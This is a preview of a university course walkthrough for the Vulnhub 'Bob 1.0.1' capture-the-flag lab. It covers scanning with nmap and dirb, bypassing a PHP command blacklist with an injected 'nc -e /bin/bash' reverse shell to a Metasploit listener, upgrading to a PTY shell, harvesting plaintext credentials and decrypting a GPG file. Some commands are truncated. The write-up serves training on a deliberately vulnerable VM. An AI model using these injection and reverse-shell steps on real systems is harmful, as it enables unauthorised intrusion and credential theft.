- Information
- AI Chat
Bob 1.0.1 Vulnhub Walkthrough
Computer and Network Security (ECC4703)
Universiti Putra Malaysia
Recommended for you
Preview text
Lab - CTF - Bob 1.0 Walkthrough
Overview
This Capture the Flag exercise is rated Beginner/Intermediate. In the scenario, the Milburg Highschool Server was compromised, causing the school's Window server to be replaced with a Linux server. Your job is to find as many attack vectors as you can and access the flag located at the root of the new Linux server.
Remember your hacking methodology and to enumerate everything!
Hardware and Software Requirements
One virtual install of Kali Linux, updated One virtual install of the Bob OVA file available for download here
Administration
For this CTF, I created a desktop directory called, bob. I’ll be doing all my work inside of this directory.
Enumeration
The first thing we need to do is find the target. For this, we can use netdiscover.
netdiscover -r 192.168.0/
1
I identify my target as 192.168.0. We can now run a Nmap scan of the target.
nmap -O -A -sT -sV -p- -T5 192.168.0 -vvv
NMap found two services, HTTP and SSH and some interesting files.
Searchsploit comes up negative.
We run dirb and nikto to see if anything pops up. Both provide the same results.
dirb 192.168.
2
HTTP is the low hanging fruit and possible our best source for a target vector. As with all web servers, the robots is always a source of interest. These are web pages not being cataloged by search engines.
We have two HTML files, lat_memo and passwords
192.168.0.27/lat_memo
192.168.0/passwords.html
4
The next page is the dev_shell page. This is going to be our attack vector. Enumerate the page and check out the source code.
5
Set the payload as linux/x86/shell/reverse_tcp
set payload linux/x86/shell/reverse_tcp
Set the payload options. The LHOST will use the IP address of our Kali machine.
show options
I type in the run command, and I have the listener up and running.
At the targets PHP shell, I type:
echo && nc 192.168.0 4444 -e /bin/bash
Back at the Metasploit terminal, I now have a basic shell. 7
Next, we use our tried and true Python code to give us an interactive shell.
python -c 'import pty; pty("/bin/bash")'
Let’s enumerate what we have so far by listing the contents of the shell.
Let’s cat out the file.
8
We have discovered the credentials for two of the four individuals found on the system.
jc:Qwerty seb:T1tanium_Pa$$word_Hack3rs_Fear_M
Bob has a documents folder, and inside we find a login.txt
The secret directory is of interest, so I change location over to it and list its contents.
We find another directory named, Keep_Out. We change location and list the contents.
10
We find another directory entitled Not_Porn. I change directory and list the contents.
We have another directory named No_Lookie_in_Here. I change directory and list the contents.
Here we find a script name notes. I cat out the contents.
11
More password information. We now have the following sets of credentials:
elliot:theadminisdumb jc:Qwerty seb:T1tanium_Pa$$word_Hack3rs_Fear_M
Seb has nothing to offer so we can return our attention the notes file.
13
The first letter of each line spells out the word HARPOCRATES. Harpocrates was the Greek god of silence, secrets, and confidentiality.
We next need to decrypt the login.txt discovered earlier in bob’s document directory. We change location back to bob’s documents and run the following command:
gpg –passphrase HARPOCRATES -d login.txt
We have the admin’s credentials, so we can logon as bob using SSH.
I check to see what sudo permissions bob has.
14
Summary
A lot of good stuff going on with this one. The PHP Dev page was locked down with a blacklist of commands not allowed but we saw how to get around that roadblock. We also learned how to create still another reverse shell and elevate it to a more interactive shell using Metasploit.
16
Bob 1.0.1 Vulnhub Walkthrough
Course: Computer and Network Security (ECC4703)
University: Universiti Putra Malaysia
This is a preview
Access to all documents
Get Unlimited Downloads
Improve your grades
